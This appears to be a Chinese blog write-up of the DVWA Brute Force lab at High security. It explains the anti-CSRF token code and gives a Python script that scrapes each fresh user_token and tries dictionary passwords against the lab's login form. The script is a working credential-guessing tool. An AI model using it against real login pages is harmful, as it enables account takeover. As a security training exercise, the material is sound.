• DVWA实验之Brute Force(暴力破解)- High


    DVWA实验之Brute Force(暴力破解)- High

     
    有关DVWA环境搭建的教程请参考:
     
     
    Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。
     
    这里我们先将安全等级设为 High
     
    这里我们开始高级实验~
     
    服务器端核心代码
     
    <?php
     
    if(isset($_GET['Login'])){
    //CheckAnti-CSRFtoken
    checkToken($_REQUEST['user_token'],$_SESSION['session_token'],'index.php');
     
    //Sanitiseusernameinput
    $user=$_GET['username'];
    $user=stripslashes($user);
    $user=mysql_real_escape_string($user);
     
    //Sanitisepasswordinput
    $pass=$_GET['password'];
    $pass=stripslashes($pass);
    $pass=mysql_real_escape_string($pass);
    $pass=md5($pass);
     
    //Checkdatabase
    $query="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';";
    $result=mysql_query($query)ordie('<pre>'.mysql_error().'</pre>');
     
    if($result&&mysql_num_rows($result)==1){
    //Getusersdetails
    $avatar=mysql_result($result,0,"avatar");
     
    //Loginsuccessfulecho"<p>Welcometothepasswordprotectedarea{$user}</p>";
    echo"<imgsrc="{$avatar}"/>";
    }
    else{
    //Loginfailed
    sleep(rand(0,3));
    echo"<pre><br/>Usernameand/orpasswordincorrect.</pre>";
    }
     
    mysql_close();
    }
     
    //GenerateAnti-CSRFtoken
    generateSessionToken();
     
    ?>
     
     
    代码解读:
    1. High级别的代码加入了Token,可以抵御CSRF攻击
    2.增加了爆破的难度
    3. High级别的代码中,使用了stripslashes(去除字符串中的反斜线字符,如果有两个连续的反斜线,则只去掉一个)、 mysql_real_escape_string对参数username、password进行过滤、转义,进一步抵御sql注入
     
    抓个包分析一下:
     
    可以看到,登录验证时提交了四个参数:username、password、Login以及user_token
    每次服务器返回的登陆页面中都会包含一个随机的user_token的值,用户每次登录时都要将user_token一起提交。服务器收到请求后,会优先做token的检查,再进行sql查询。
     
     
     
     
     
     
    (stripslashes(去除字符串中的反斜线字符,如果有两个连续的反斜线,则只去掉一个)、 mysql_real_escape_string对参数username、password进行过滤、转义,进一步抵御sql注入)
     
    由于加入了Anti-CSRFtoken预防无脑爆破,就不使用burpsuite啦~
     
     
    参考大佬写的脚本
     
    from bs4 import BeautifulSoup
    import urllib2
    header={ 'Host': '192.168.xxx.xxx', //目标主机(DVWA)的ip
    'Cache-Control': 'max-age=0',
    'If-None-Match': "307-52156c6a290c0",
    'If-Modified-Since': 'Mon, 05 Oct 2015 07:51:07 GMT',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36',
    'Accept': '*/*',
    'Referer': 'http://192.168.xxx.xxx/dvwa/vulnerabilities/brute/index.php',
    'Accept-Encoding': 'gzip, deflate, sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Cookie': 'security=high; PHPSESSID=5re92j36t4f2k1gvnqdf958bi2'}
    requrl = "http://192.168.xxx.xxx/dvwa/vulnerabilities/brute/"
     
    def get_token(requrl,header):
    req = urllib2.Request(url=requrl,headers=header)
    response = urllib2.urlopen(req)
    print response.getcode(),
    the_page = response.read()
    print len(the_page)
    soup = BeautifulSoup(the_page,"html.parser")
    user_token = soup.form.input.input.input.input["value"] #get the user_token
    return user_token
     
    user_token = get_token(requrl,header)
    i=0for line in open("rkolin.txt"):
    requrl = "http://192.168.xxx.xxx/dvwa/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
    i = i+1
    print i,'admin',line.strip(),
    user_token = get_token(requrl,header)
    if (i == 10):
    break
     
    get_token的功能是通过python的BeautifulSoup库从html页面中抓取user_token的值。
     
     
     
    对比结果看到,密码为password时返回的长度不太一样,手工验证,登录成功,爆破完成。
     
     
     
     
     
     
     
     
    参考资料:
     
     
    https://www.cnblogs.com/pinocchioatbeijing/archive/2012/03/20/2407869.html
     
     
     
     
  • 相关阅读:
    .net framework v4.5.2
    sql数据库不允许保存更改和保存失败解决方法
    如何查看笔记本电脑型号
    Premiere 5.0/5 .5菜单详解
    Python编辑器英文菜单的中文翻译及解释
    SqlServer--常用数据查询
    pycharm上方菜单栏不见了如何恢复
    笔记本电脑的f1到f12怎么按
    C#的访问权限
    封装,继承和多态知识点汇总
  • 原文地址:https://www.cnblogs.com/0yst3r-2046/p/11670222.html
Copyright © 2020-2023  润新知